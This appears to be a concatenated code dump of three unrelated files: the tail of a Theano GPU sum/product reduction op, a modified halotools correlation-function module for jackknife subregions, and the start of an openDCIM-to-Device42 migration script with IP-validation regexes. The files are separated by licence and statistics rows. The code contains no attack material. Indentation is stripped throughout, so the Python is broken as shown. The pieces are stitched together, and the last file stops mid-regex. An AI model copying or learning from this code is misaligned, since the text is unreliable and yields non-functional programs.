return super(GpuCAReduceCPY, self).make_thunk(
node, storage_map, compute_map, no_recycling)
def get_kernel_cache(self, node):
attr = '@cache_reduction_k'
if self.axis is None:
redux = [True] * node.inputs[0].ndim
else:
redux = self.redux
if not hasattr(node, attr):
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
if any(redux):
setattr(node, attr, self.generate_kernel(node, acc_dtype,
redux))
if any(redux):
return getattr(node, attr)
def gpu_kernels(self, node, name):
if not any(getattr(self, 'redux', [node.inputs[0].ndim != 0])):
# Some OpenCL compilers do not accept no-arguments kernels
src = "KERNEL void reduk(GLOBAL_MEM float *a) {}"
params = ['float32']
else:
k = self.get_kernel_cache(node)
_, src, _, _ = k._get_basic_kernel(k.init_local_size,
node.inputs[0].ndim)
nd = node.inputs[0].ndim
params = ['uint32', gpuarray.GpuArray]
params.extend('uint32' for _ in range(nd))
params.append(gpuarray.GpuArray)
params.append('uint32')
params.extend('int32' for _ in range(nd))
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
return [Kernel(code=src, name="reduk", params=params,
flags=Kernel.get_flags(node.inputs[0].type.dtype,
acc_dtype,
node.outputs[0].type.dtype),
objvar='k_reduk_' + name)]
def c_code(self, node, name, inp, out, sub):
if not any(getattr(self, 'redux', [node.inputs[0].ndim != 0])):
# We special case the no-reduction case since the gpu
# kernel has trouble handling it.
return """
Py_XDECREF(%(out)s);
%(out)s = pygpu_copy(%(inp)s, GA_ANY_ORDER);
if (!%(out)s) {
%(fail)s
}
if (%(sync)d)
GpuArray_sync(&%(out)s->ga);
""" % dict(out=out[0], inp=inp[0], fail=sub['fail'],
sync=bool(config.gpuarray.sync))
k = self.get_kernel_cache(node)
_, src, _, ls = k._get_basic_kernel(k.init_local_size,
node.inputs[0].ndim)
if self.axis is None:
redux = [True] * node.inputs[0].ndim
else:
redux = self.redux
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
input = inp[0]
output = out[0]
nd_out = node.outputs[0].ndim
code = """
size_t gs = 1;
size_t ls;
unsigned int n = 1;
unsigned int proxy_dim[%(nd_in)s];
unsigned int proxy_off;
int proxy_str[%(nd_in)s];
void *args[%(n_args)s];
PyGpuArrayObject *tmp;
int err;
""" % dict(n_args=4 + (node.inputs[0].ndim * 2), nd_in=node.inputs[0].ndim)
if nd_out != 0:
code += """
size_t out_dims[%(nd_out)s];
int need_out = %(output)s == NULL || %(output)s->ga.nd != %(nd_out)s;
""" % dict(nd_out=nd_out, output=output)
j = 0
for i in range(node.inputs[0].ndim):
if not self.redux[i]:
code += """
out_dims[%(j)s] = %(input)s->ga.dimensions[%(i)s];
if (!need_out)
need_out |= %(output)s->ga.dimensions[%(j)s] != out_dims[%(j)s];
""" % dict(j=j, i=i, input=input, output=output)
j += 1
code += """
if (need_out) {
%(output)s = pygpu_empty(%(nd_out)s, out_dims, %(out_type)s, GA_C_ORDER, %(ctx)s, Py_None);
if (!%(output)s) {
%(fail)s
}
}
""" % dict(output=output, nd_out=nd_out, fail=sub['fail'],
ctx=sub['params'],
out_type=dtype_to_typecode(node.outputs[0].type.dtype))
else:
code += """
if (%(output)s == NULL || %(output)s->ga.nd != 0) {
Py_XDECREF(%(output)s);
%(output)s = pygpu_empty(0, NULL, %(out_type)s, GA_C_ORDER,
%(ctx)s, Py_None);
if (!%(output)s) {
%(fail)s
}
}
""" % dict(output=output, fail=sub['fail'], ctx=sub['params'],
out_type=dtype_to_typecode(node.outputs[0].type.dtype))
if acc_dtype != node.outputs[0].type.dtype:
code += """
tmp = pygpu_empty(%(output)s->ga.nd, %(output)s->ga.dimensions,
%(acc_type)s, GA_C_ORDER, %(ctx)s, Py_None);
if (!tmp) %(fail)s
""" % dict(output=output, fail=sub['fail'], ctx=sub['params'],
acc_type=dtype_to_typecode(acc_dtype))
else:
code += """
tmp = %(output)s;
Py_INCREF(tmp);
""" % dict(output=output)
# We need the proxies since we are passing a pointer to the
# data into the call and therefore we need a real copy of the
# data in the proper type.
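# (illustrative: ga.dimensions / ga.strides hold ga_size / ga_ssize values,
#  while this kernel was declared with 'uint32' / 'int32' parameters, so
#  each value is first narrowed into proxy_dim / proxy_off / proxy_str and
#  the corresponding args[] slot points at that correctly-typed copy)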
code += """
args[0] = &n;
args[1] = tmp->ga.data;
""" % dict(output=output)
p = 2
for i in range(node.inputs[0].ndim):
code += """
proxy_dim[%(i)s] = %(input)s->ga.dimensions[%(i)s];
args[%(p)s] = &proxy_dim[%(i)s];
n *= %(input)s->ga.dimensions[%(i)s];
""" % dict(i=i, p=p, input=input)
p += 1
if not redux[i]:
code += "gs *= %(input)s->ga.dimensions[%(i)s];" % dict(input=input, i=i)
code += """
args[%(p)s] = %(input)s->ga.data;
proxy_off = %(input)s->ga.offset;
args[%(p)s+1] = &proxy_off;
""" % dict(p=p, input=input)
p += 2
for i in range(node.inputs[0].ndim):
code += """
proxy_str[%(i)s] = %(input)s->ga.strides[%(i)s];
args[%(p)s] = &proxy_str[%(i)s];
""" % dict(p=p, i=i, input=input)
p += 1
code += """
if (gs == 0) gs = 1;
n /= gs;
ls = %(ls)s;
err = GpuKernel_call(&%(k_var)s, 1, &ls, &gs, 0, args);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: GpuCAReduceCPY: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s
}
if (%(cast_out)d) {
err = GpuArray_move(&%(output)s->ga, &tmp->ga);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: GpuCAReduceCPY [cast]: %%s.",
GpuArray_error(&tmp->ga, err));
%(fail)s
}
} else {
Py_XDECREF(%(output)s);
%(output)s = tmp;
}
if (%(sync)d) {
err = GpuArray_sync(&%(output)s->ga);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: GpuCAReduceCPY: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s
}
}
""" % dict(k_var='k_reduk_' + name, sync=bool(config.gpuarray.sync),
ls=ls, fail=sub['fail'], output=output, input=input,
cast_out=bool(acc_dtype != node.outputs[0].type.dtype))
return code
def c_code_cache_version(self):
return (2, self.GpuKernelBase_version)
def generate_kernel(self, node, odtype, redux):
if isinstance(self.scalar_op, scalar.basic.Add):
reduce_expr = "a + b"
elif isinstance(self.scalar_op, scalar.basic.Mul):
reduce_expr = "a * b"
else:
raise NotImplementedError()
return ReductionKernel(node.inputs[0].type.context, odtype,
self.scalar_op.identity, reduce_expr, redux,
arguments=[make_argument(node.inputs[0], 'a')],
init_nd=node.inputs[0].ndim)
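# e.g. (sketch): for a float32 sum over every axis this amounts to
#   ReductionKernel(ctx, 'float32', 0, "a + b", [True] * nd,
#                   arguments=[make_argument(inp, 'a')], init_nd=nd)
# i.e. a pygpu reduction folding pairs with "a + b", seeded with the
# scalar op's identity (0 for Add, 1 for Mul).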
def perform(self, node, inp, out, ctx):
input, = inp
output, = out
if self.axis is None:
redux = [True] * input.ndim
else:
redux = self.redux
if any(redux):
output[0] = self.get_kernel_cache(node)(input).astype(
copy=False, dtype=node.outputs[0].type.dtype)
else:
output[0] = pygpu.gpuarray.array(input, copy=True,
dtype=node.outputs[0].type.dtype,
context=ctx)
# To allow reloading old pickled files
GpuCAReduce = GpuCAReduceCPY
| mit | -9,199,357,860,788,290,000 | 39.339559 | 156 | 0.449773 | false | 3.62162 | false | false | false |
mclaughlin6464/pearce | pearce/mocks/tpcfSubregions.py | 1 | 21979 | """
I'm modifying the halotools tpcf code to add a few more efficiencies.
One directly returns the correlation functions from subregions, so I can compute arbitrary jackknives more efficiently.
Another is to add flags for do_auto1 and do_auto2: sometimes you wanna compute xi_gg and xi_gm but not xi_mm!
"""
from __future__ import absolute_import, division, unicode_literals
import numpy as np
from math import gamma  # needed by nball_volume() inside _random_counts below
from halotools.mock_observables import *
from halotools.mock_observables.two_point_clustering import *
from halotools.mock_observables.two_point_clustering.tpcf import _tpcf_process_args
# (halotools' _random_counts is deliberately not imported: this module
#  defines its own version below, extended with a ``diff`` flag)
from halotools.mock_observables.two_point_clustering.tpcf_estimators import _TP_estimator, _TP_estimator_requirements
from halotools.mock_observables.pair_counters import npairs_jackknife_3d
from halotools.mock_observables.two_point_clustering.clustering_helpers import (process_optional_input_sample2,
verify_tpcf_estimator, tpcf_estimator_dd_dr_rr_requirements)
from halotools.mock_observables.two_point_clustering.tpcf_jackknife import \
_tpcf_jackknife_process_args, _enclose_in_box, get_subvolume_numbers, jrandom_counts
np.seterr(divide='ignore', invalid='ignore') # ignore divide by zero in e.g. DD/RR
__all__ = ['tpcf_subregions', 'tpcf']
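# A minimal usage sketch of the modified tpcf below (``gals``, ``ptcl`` and
# ``Lbox`` are illustrative placeholders, not part of this module):
#
#   rbins = np.logspace(-1, 1.5, 19)
#   xi_gg, xi_gm = tpcf(gals, rbins, sample2=ptcl, period=Lbox,
#                       do_auto1=True, do_cross=True, do_auto2=False)
#
# do_auto2=False skips the expensive xi_mm pair count entirely.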
# all lifted from duncan's code
def tpcf_subregions(sample1, randoms, rbins, Nsub=[5, 5, 5],
sample2=None, period=None, do_auto1=True, do_auto2=False, do_cross=True,
estimator='Natural', num_threads=1, seed=None, RR=None):
do_auto = do_auto1 or do_auto2
# process input parameters
function_args = (sample1, randoms, rbins, Nsub, sample2, period, do_auto,
do_cross, estimator, num_threads, seed)
sample1, rbins, Nsub, sample2, randoms, period, do_auto, do_cross, num_threads,\
_sample1_is_sample2, PBCs = _tpcf_jackknife_process_args(*function_args)
# determine box size the data occupies.
# This is used in determining jackknife samples.
if PBCs is False:
sample1, sample2, randoms, Lbox = _enclose_in_box(sample1, sample2, randoms)
else:
Lbox = period
do_DD, do_DR, do_RR = _TP_estimator_requirements(estimator)
N1 = len(sample1)
N2 = len(sample2)
NR = len(randoms)
j_index_1, N_sub_vol = cuboid_subvolume_labels(sample1, Nsub, Lbox)
j_index_2, N_sub_vol = cuboid_subvolume_labels(sample2, Nsub, Lbox)
j_index_random, N_sub_vol = cuboid_subvolume_labels(randoms, Nsub, Lbox)
# number of points in each subvolume
NR_subs = get_subvolume_numbers(j_index_random, N_sub_vol)
N1_subs = get_subvolume_numbers(j_index_1, N_sub_vol)
N2_subs = get_subvolume_numbers(j_index_2, N_sub_vol)
# number of points in each jackknife sample
N1_subs = N1 - N1_subs
N2_subs = N2 - N2_subs
NR_subs = NR - NR_subs
# calculate all the pair counts
# TODO need to modify this function
D1D1, D1D2, D2D2 = jnpair_counts(
sample1, sample2, j_index_1, j_index_2, N_sub_vol,
rbins, period, num_threads, do_auto1, do_cross, do_auto2, _sample1_is_sample2)
# pull out the full and sub sample results
if _sample1_is_sample2:
D1D1_full = D1D1[0, :]
D1D1_sub = D1D1[1:, :]
D1D2_full = D1D2[0, :]
D1D2_sub = D1D2[1:, :]
D2D2_full = D2D2[0, :]
D2D2_sub = D2D2[1:, :]
else:
if do_auto1:
D1D1_full = D1D1[0, :]
D1D1_sub = D1D1[1:, :]
if do_cross:
D1D2_full = D1D2[0, :]
D1D2_sub = D1D2[1:, :]
if do_auto2:
D2D2_full = D2D2[0, :]
D2D2_sub = D2D2[1:, :]
# do random counts
# TODO figure out what of this i can skip?
if RR is None:
D1R, RR = jrandom_counts(sample1, randoms, j_index_1, j_index_random, N_sub_vol,
rbins, period, 1, do_DR, do_RR)
else: #use the precomputed RR
D1R, RR_dummy = jrandom_counts(sample1, randoms, j_index_1, j_index_random, N_sub_vol,
rbins, period, 1, do_DR, do_RR=False)
print 'A'
if _sample1_is_sample2:
D2R = D1R
else:
if do_DR is True:
D2R, RR_dummy = jrandom_counts(sample2, randoms, j_index_2, j_index_random,
N_sub_vol, rbins, period, num_threads, do_DR, do_RR=False)
else:
D2R = None
print 'B'
if do_DR is True:
D1R_full = D1R[0, :]
D1R_sub = D1R[1:, :]
D2R_full = D2R[0, :]
D2R_sub = D2R[1:, :]
else:
D1R_full = None
D1R_sub = None
D2R_full = None
D2R_sub = None
if do_RR is True:
RR_full = RR[0, :]
RR_sub = RR[1:, :]
else:
RR_full = None
RR_sub = None
# calculate the correlation function for the subsamples
outputs = []
print 'C'
if do_auto1 or _sample1_is_sample2:
xi_11_sub = _TP_estimator(D1D1_sub, D1R_sub, RR_sub, N1_subs, N1_subs, NR_subs, NR_subs, estimator)
outputs.append(xi_11_sub)
if do_cross:
xi_12_sub = _TP_estimator(D1D2_sub, D1R_sub, RR_sub, N1_subs, N2_subs, NR_subs, NR_subs, estimator)
outputs.append(xi_12_sub)
if do_auto2:
xi_22_sub = _TP_estimator(D2D2_sub, D2R_sub, RR_sub, N2_subs, N2_subs, NR_subs, NR_subs, estimator)
outputs.append(xi_22_sub)
return outputs[0] if len(outputs) == 1 else tuple(outputs)
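# A sketch of feeding the subregion output into a delete-one jackknife
# covariance (illustrative assumption; ``gals``/``Lbox`` are placeholders):
#
#   xi_sub = tpcf_subregions(gals, randoms, rbins, Nsub=[5, 5, 5],
#                            period=Lbox, do_auto1=True, do_cross=False)
#   n_sub = xi_sub.shape[0]
#   cov = np.cov(xi_sub, rowvar=False) * (n_sub - 1) ** 2 / n_sub
#
# Each row of xi_sub is the estimator with one subvolume deleted, which is
# what makes an arbitrary jackknife cheap to assemble afterwards.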
def tpcf(sample1, rbins, sample2=None, randoms=None, period=None,
do_auto1=True, do_cross=True, do_auto2=False, estimator='Natural', num_threads=1,
approx_cell1_size=None, approx_cell2_size=None, approx_cellran_size=None,
RR_precomputed=None, NR_precomputed=None, seed=None, n_split=20):
r"""
Calculate the real space two-point correlation function, :math:`\xi(r)`.
Example calls to this function appear in the documentation below.
See the :ref:`mock_obs_pos_formatting` documentation page for
instructions on how to transform your coordinate position arrays into the
format accepted by the ``sample1`` and ``sample2`` arguments.
See also :ref:`galaxy_catalog_analysis_tutorial2` for example usage on a
mock galaxy catalog.
Parameters
----------
sample1 : array_like
Npts1 x 3 numpy array containing 3-D positions of points.
See the :ref:`mock_obs_pos_formatting` documentation page, or the
Examples section below, for instructions on how to transform
your coordinate position arrays into the
format accepted by the ``sample1`` and ``sample2`` arguments.
Length units are comoving and assumed to be in Mpc/h, here and throughout Halotools.
rbins : array_like
array of boundaries defining the real space radial bins in which pairs are counted.
Length units are comoving and assumed to be in Mpc/h, here and throughout Halotools.
sample2 : array_like, optional
Npts2 x 3 array containing 3-D positions of points.
Passing ``sample2`` as an input permits the calculation of
the cross-correlation function.
Default is None, in which case only the
auto-correlation function will be calculated.
randoms : array_like, optional
Nran x 3 array containing 3-D positions of randomly distributed points.
If no randoms are provided (the default option),
calculation of the tpcf can proceed using analytical randoms
(only valid for periodic boundary conditions).
period : array_like, optional
Length-3 sequence defining the periodic boundary conditions
in each dimension. If you instead provide a single scalar, Lbox,
period is assumed to be the same in all Cartesian directions.
If set to None (the default option), PBCs are set to infinity,
in which case ``randoms`` must be provided.
Length units are comoving and assumed to be in Mpc/h, here and throughout Halotools.
do_auto1 : boolean, optional
Boolean determines whether the auto-correlation function of ``sample1``
will be calculated and returned. Default is True.
do_cross : boolean, optional
Boolean determines whether the cross-correlation function will
be calculated and returned. Only relevant when ``sample2`` is also provided.
Default is True for the case where ``sample2`` is provided, otherwise False.
do_auto2 : boolean, optional
Boolean determines whether the auto-correlation function of ``sample2``
will be calculated and returned. Default is False.
estimator : string, optional
Statistical estimator for the tpcf.
Options are 'Natural', 'Davis-Peebles', 'Hewett' , 'Hamilton', 'Landy-Szalay'
Default is ``Natural``.
num_threads : int, optional
Number of threads to use in calculation, where parallelization is performed
using the python ``multiprocessing`` module. Default is 1 for a purely serial
calculation, in which case a multiprocessing Pool object will
never be instantiated. A string 'max' may be used to indicate that
the pair counters should use all available cores on the machine.
approx_cell1_size : array_like, optional
Length-3 array serving as a guess for the optimal manner by how points
will be apportioned into subvolumes of the simulation box.
The optimum choice unavoidably depends on the specs of your machine.
Default choice is to use Lbox/10 in each dimension,
which will return reasonable result performance for most use-cases.
Performance can vary sensitively with this parameter, so it is highly
recommended that you experiment with this parameter when carrying out
performance-critical calculations.
approx_cell2_size : array_like, optional
Analogous to ``approx_cell1_size``, but for sample2. See comments for
``approx_cell1_size`` for details.
approx_cellran_size : array_like, optional
Analogous to ``approx_cell1_size``, but for randoms. See comments for
``approx_cell1_size`` for details.
RR_precomputed : array_like, optional
Array storing the number of RR-counts calculated in advance during
a pre-processing phase. Must have the same length as *len(rbins)*.
If the ``RR_precomputed`` argument is provided,
you must also provide the ``NR_precomputed`` argument.
Default is None.
NR_precomputed : int, optional
Number of points in the random sample used to calculate ``RR_precomputed``.
If the ``NR_precomputed`` argument is provided,
you must also provide the ``RR_precomputed`` argument.
Default is None.
seed : int, optional
Random number seed used to randomly downsample data, if applicable.
Default is None, in which case downsampling will be stochastic.
n_split : int, optional
Number of chunks the random catalog is split into when counting random
pairs, to limit the peak memory of each pair-counting call. Default is 20.
Returns
-------
correlation_function(s) : numpy.array
*len(rbins)-1* length array containing the correlation function :math:`\xi(r)`
computed in each of the bins defined by input ``rbins``.
.. math::
1 + \xi(r) \equiv \mathrm{DD}(r) / \mathrm{RR}(r),
If ``estimator`` is set to 'Natural'. :math:`\mathrm{DD}(r)` is the number
of sample pairs with separations equal to :math:`r`, calculated by the pair
counter. :math:`\mathrm{RR}(r)` is the number of random pairs with separations
equal to :math:`r`, and is counted internally using "analytic randoms" if
``randoms`` is set to None (see notes for an explanation), otherwise it is
calculated using the pair counter.
If ``sample2`` is passed as input
(and if ``sample2`` is not exactly the same as ``sample1``),
then three arrays of length *len(rbins)-1* are returned:
.. math::
\xi_{11}(r), \xi_{12}(r), \xi_{22}(r),
the autocorrelation of ``sample1``, the cross-correlation between ``sample1`` and
``sample2``, and the autocorrelation of ``sample2``, respectively.
If ``do_auto1``, ``do_cross``, or ``do_auto2`` is set to False,
the appropriate subsequence of results is returned.
Notes
-----
For a higher-performance implementation of the tpcf function written in C,
see the Corrfunc code written by Manodeep Sinha, available at
https://github.com/manodeep/Corrfunc.
Examples
--------
For demonstration purposes we calculate the `tpcf` for halos in the
`~halotools.sim_manager.FakeSim`.
>>> from halotools.sim_manager import FakeSim
>>> halocat = FakeSim()
>>> x = halocat.halo_table['halo_x']
>>> y = halocat.halo_table['halo_y']
>>> z = halocat.halo_table['halo_z']
We transform our *x, y, z* points into the array shape used by the pair-counter by
taking the transpose of the result of `numpy.vstack`. This boilerplate transformation
is used throughout the `~halotools.mock_observables` sub-package:
>>> sample1 = np.vstack((x,y,z)).T
Alternatively, you may use the `~halotools.mock_observables.return_xyz_formatted_array`
convenience function for this same purpose, which provides additional wrapper
behavior around `numpy.vstack` such as placing points into redshift-space.
>>> rbins = np.logspace(-1, 1, 10)
>>> xi = tpcf(sample1, rbins, period=halocat.Lbox)
See also
--------
:ref:`galaxy_catalog_analysis_tutorial2`
"""
do_auto = do_auto1 or do_auto2
# check input arguments using clustering helper functions
function_args = (sample1, rbins, sample2, randoms, period,
do_auto, do_cross, estimator, num_threads,
approx_cell1_size, approx_cell2_size, approx_cellran_size,
RR_precomputed, NR_precomputed, seed)
# pass arguments in, and get out processed arguments, plus some control flow variables
(sample1, rbins, sample2, randoms, period,
do_auto, do_cross, num_threads,
_sample1_is_sample2, PBCs,
RR_precomputed, NR_precomputed) = _tpcf_process_args(*function_args)
# What needs to be done?
do_DD, do_DR, do_RR = tpcf_estimator_dd_dr_rr_requirements[estimator]
if RR_precomputed is not None:
# overwrite do_RR as necessary
do_RR = False
# How many points are there (for normalization purposes)?
N1 = len(sample1)
N2 = len(sample2)
if randoms is not None:
NR = len(randoms)
else:
# set the number of randoms equal to the number of points in sample1
# this is arbitrarily set, but must remain consistent!
if NR_precomputed is not None:
NR = NR_precomputed
else:
NR = N1
# count data pairs
D1D1, D1D2, D2D2 = _pair_counts(sample1, sample2, rbins, period,
num_threads, do_auto1, do_cross, do_auto2, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size)
# count random pairs
# split this up over a few because randoms is large
# TODO do they stack like this?
split_randoms = np.array_split(randoms, n_split, axis = 0)
D1R, D2R, RR = np.zeros((len(rbins))), np.zeros((len(rbins))), np.zeros((len(rbins)))
#D1Rs = []
for i, _rand in enumerate(split_randoms):
#print i,
# don't diff here until after!
_D1R, _D2R, _RR = _random_counts(sample1, sample2, _rand, rbins,
period, PBCs, num_threads, do_RR, do_DR, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size, approx_cellran_size, diff=False)
#D1Rs.append(_D1R)
if _D1R is not None:
D1R+=_D1R
if _D2R is not None:
D2R+=_D2R
if _RR is not None:
RR+=_RR
D1R = np.diff(D1R)
D2R = np.diff(D2R)
RR = np.diff(RR)
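# (summing the cumulative, un-diffed counts chunk by chunk and taking a
#  single np.diff at the end is equivalent to diffing each chunk and then
#  summing -- np.diff is linear -- which is why _random_counts gained the
#  diff=False flag above)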
if RR_precomputed is not None:
RR = RR_precomputed
# run results through the estimator and return relevant / user-specified results.
outputs = []
if do_auto1 or _sample1_is_sample2:
xi_11 = _TP_estimator(D1D1, D1R, RR, N1, N1, NR, NR, estimator)
outputs.append(xi_11)
if do_cross:
xi_12 = _TP_estimator(D1D2, D1R, RR, N1, N2, NR, NR, estimator)
outputs.append(xi_12)
if do_auto2:
xi_22 = _TP_estimator(D2D2, D2R, RR, N2, N2, NR, NR, estimator)
outputs.append(xi_22)
return outputs[0] if len(outputs) ==1 else tuple(outputs)
# overload to skip the xi_mm calculation
def jnpair_counts(sample1, sample2, j_index_1, j_index_2, N_sub_vol, rbins,
period, num_threads, do_auto1 = True, do_cross=False,do_auto2=False, _sample1_is_sample2=False):
"""
Count jackknife data pairs: DD
"""
if do_auto1 is True:
D1D1 = npairs_jackknife_3d(sample1, sample1, rbins, period=period,
jtags1=j_index_1, jtags2=j_index_1, N_samples=N_sub_vol,
num_threads=num_threads)
D1D1 = np.diff(D1D1, axis=1)
else:
D1D1 = None
D2D2 = None
if _sample1_is_sample2:
D1D2 = D1D1
D2D2 = D1D1
else:
if do_cross is True:
D1D2 = npairs_jackknife_3d(sample1, sample2, rbins, period=period,
jtags1=j_index_1, jtags2=j_index_2,
N_samples=N_sub_vol, num_threads=num_threads)
D1D2 = np.diff(D1D2, axis=1)
else:
D1D2 = None
if do_auto2 is True:
D2D2 = npairs_jackknife_3d(sample2, sample2, rbins, period=period,
jtags1=j_index_2, jtags2=j_index_2,
N_samples=N_sub_vol, num_threads=num_threads)
D2D2 = np.diff(D2D2, axis=1)
else:
D2D2 = None
return D1D1, D1D2, D2D2
def _pair_counts(sample1, sample2, rbins,
period, num_threads, do_auto1, do_cross, do_auto2,
_sample1_is_sample2, approx_cell1_size, approx_cell2_size):
r"""
Internal function used to calculate DD-pairs during the calculation of the tpcf.
"""
if do_auto1 is True:
D1D1 = npairs_3d(sample1, sample1, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell1_size,
approx_cell2_size=approx_cell1_size)
D1D1 = np.diff(D1D1)
else:
D1D1 = None
D2D2 = None
if _sample1_is_sample2:
D1D2 = D1D1
D2D2 = D1D1
else:
if do_cross is True:
D1D2 = npairs_3d(sample1, sample2, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell1_size,
approx_cell2_size=approx_cell2_size)
D1D2 = np.diff(D1D2)
else:
D1D2 = None
if do_auto2 is True:
D2D2 = npairs_3d(sample2, sample2, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell2_size,
approx_cell2_size=approx_cell2_size)
D2D2 = np.diff(D2D2)
else:
D2D2 = None
return D1D1, D1D2, D2D2
def _random_counts(sample1, sample2, randoms, rbins, period, PBCs, num_threads,
do_RR, do_DR, _sample1_is_sample2, approx_cell1_size,
approx_cell2_size, approx_cellran_size, diff = True):
r"""
Internal function used to count random pairs during the calculation of the tpcf.
There are two high level branches:
1. w/ or wo/ PBCs and randoms.
2. PBCs and analytical randoms
There is also control flow governing whether RR and DR pairs are counted,
as not all estimators need one or the other.
Analytical counts are N**2*dv*rho, where dv is the volume of the spherical
shells, which is the correct volume to use for a continuous cubical volume with PBCs.
Adding a function to do the diff after so you can split it up a little better.
"""
def nball_volume(R, k=3):
"""
Calculate the volume of an n-sphere.
This is used for the analytical randoms.
"""
return (np.pi**(k/2.0)/gamma(k/2.0+1.0))*R**k
# randoms provided, so calculate random pair counts.
if randoms is not None:
if do_RR is True:
RR = npairs_3d(randoms, randoms, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cellran_size,
approx_cell2_size=approx_cellran_size)
if diff:
RR = np.diff(RR)
else:
RR = None
if do_DR is True:
D1R = npairs_3d(sample1, randoms, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell1_size,
approx_cell2_size=approx_cellran_size
)
if diff:
D1R = np.diff(D1R)
else:
D1R = None
if _sample1_is_sample2:
D2R = None
else:
if do_DR is True:
D2R = npairs_3d(sample2, randoms, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell2_size,
approx_cell2_size=approx_cellran_size)
if diff:
D2R = np.diff(D2R)
else:
D2R = None
return D1R, D2R, RR
# PBCs and no randoms--calculate randoms analytically.
elif randoms is None:
# set the number of randoms equal to the number of points in sample1
NR = len(sample1)
# do volume calculations
v = nball_volume(rbins) # volume of spheres
dv = np.diff(v) # volume of shells
global_volume = period.prod() # volume of simulation
# calculate randoms for sample1
N1 = np.shape(sample1)[0] # number of points in sample1
rho1 = N1/global_volume # number density of points
D1R = (NR)*(dv*rho1) # random counts are N**2*dv*rho
# calculate randoms for sample2
N2 = np.shape(sample2)[0] # number of points in sample2
rho2 = N2/global_volume # number density of points
D2R = (NR)*(dv*rho2) # random counts are N**2*dv*rho
# calculate the random-random pairs.
rhor = (NR**2)/global_volume
RR = (dv*rhor)
return D1R, D2R, RR
| mit | 554,307,896,365,136,200 | 40.785171 | 117 | 0.629282 | false | 3.350968 | false | false | false |
device42/OpenDCIM-to-Device42-Migration | opendcim2d42.py | 1 | 19438 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import re
import sys
import pymysql as sql
import codecs
import requests
import base64
import random
import json
# ========================================================================
# IMPORTANT !!!
# Devices that are not based on device template are not going to be migrated
# * TemplateID (openDCIM) == Hardware Model (Device42)
# Racks without height, are not going to be migrated
# ========================================================================
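# In short (summary inferred from the methods below):
# fac_DataCenter -> D42 building, fac_Zone -> room, fac_Cabinet -> rack,
# fac_Device -> device / PDU, fac_DeviceTemplate -> hardware / PDU model.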
# ====== MySQL Source (openDCIM) ====== #
DB_IP = ''
DB_PORT = ''
DB_NAME = ''
DB_USER = ''
DB_PWD = ''
# ====== Log settings ==================== #
LOGFILE = 'migration.log'
DEBUG = True
# ====== Device42 upload settings ========= #
D42_USER = ''
D42_PWD = ''
D42_URL = 'https://'
DRY_RUN = False
def is_valid_ip(ip):
"""Validates IP addresses.
"""
return is_valid_ipv4(ip) or is_valid_ipv6(ip)
def is_valid_ipv4(ip):
"""Validates IPv4 addresses.
"""
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
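# Quick illustrative checks (assumptions, in the spirit of the
# inet_aton-style parsing the regex above implements):
#   is_valid_ipv4('192.168.0.1')  -> True
#   is_valid_ipv4('not-an-ip')    -> False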
def is_valid_ipv6(ip):
"""Validates IPv6 addresses.
"""
pattern = re.compile(r"""
^
\s* # Leading whitespace
(?!.*::.*::) # Only a single whildcard allowed
(?:(?!:)|:(?=:)) # Colon iff it would be part of a wildcard
(?: # Repeat 6 times:
[0-9a-f]{0,4} # A group of at most four hexadecimal digits
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
){6} #
(?: # Either
[0-9a-f]{0,4} # Another group
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
[0-9a-f]{0,4} # Last group
(?: (?<=::) # Colon iff preceeded by exacly one colon
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
